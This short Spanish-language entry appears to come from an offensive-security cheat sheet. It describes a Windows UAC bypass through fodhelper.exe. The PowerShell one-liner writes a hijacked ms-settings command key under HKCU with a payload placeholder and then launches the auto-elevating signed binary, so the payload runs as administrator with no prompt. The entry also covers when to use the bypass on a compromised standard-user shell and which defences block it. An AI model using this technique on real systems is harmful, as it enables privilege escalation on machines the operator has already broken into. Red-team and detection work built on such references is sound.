UAC bypass fodhelper
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force ; Set-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c <payload>" ; Start-Process "C:\Windows\System32\fodhelper.exe"
Bypass de UAC usando fodhelper.exe: secuestra el registro HKCU de ms-settings para que el binario firmado de Windows ejecute tu payload elevado.
Cuando tienes una shell como usuario estándar en un host con UAC en nivel alto (default) y necesitas ejecutar un proceso con privilegios de administrador sin prompt. fodhelper.exe es un binario firmado de Microsoft que se auto-eleva y ejecuta el comando del registro.
Si la política restringe la auto-elevación de binarios firmados (UAC con 'Prompt for consent' en admin) o el EDR monitoriza escrituras en HKCU\Software\Classes. Tampoco funciona si ya eres administrador local con UAC deshabilitado.